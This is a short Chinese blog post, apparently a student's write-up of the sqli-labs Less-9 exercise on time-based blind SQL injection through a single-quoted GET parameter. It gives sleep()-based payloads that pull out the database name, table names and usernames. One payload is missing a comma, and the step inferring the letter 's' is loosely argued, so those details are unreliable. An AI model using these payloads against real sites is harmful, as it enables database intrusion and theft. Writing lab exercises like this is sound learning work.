sqli(9)

less9--基于时间的GET单引号盲注

前言

重写博客是为了赶作业,现在已经下定决心考研了。以后这个博客只会记录我的数学、英语、数据结构学习记录了。我还是

想使劲冲一把,但是最近羁绊太多。很多作业(除了渗透),我都觉得很鸡肋。算了,放宽心。comfortable。

0x01 基本知识学习

无论输入什么都是原界面:

  • 如果注入的SQL代码不影响后台[数据库]的正常功能执行,那么Web应用的页面显示正确(原始页面)。
  • 如果注入的SQL代码影响后台数据库的正常功能(产生了SQL注入),但是此时Web应用的页面依旧显示正常(原因是Web应用程序采取了“重定向”或“屏蔽”措施)。

0x02 实验开始

1.通过时间盲注得出本条语句是否正确,返回的时间和设定的时间差不多则语句是正确的。

原界面:

 

 2.开始暴数据库名

 

 

?id=1' and if(ascii(substr(database(),1,1))>115,0,sleep(5))--+

 

ASCII码大于115是正确的,说明取115=“s”

3.暴表名

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 0,sleep(5))

 

4.爆字段和构造方法

?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))>100, 0,sleep(5)) #

 

 记住,明年明年和你竞争的人有400万。。。

posted @ 2019-12-19 15:57  这醋好甜  阅读(326)  评论(0编辑  收藏  举报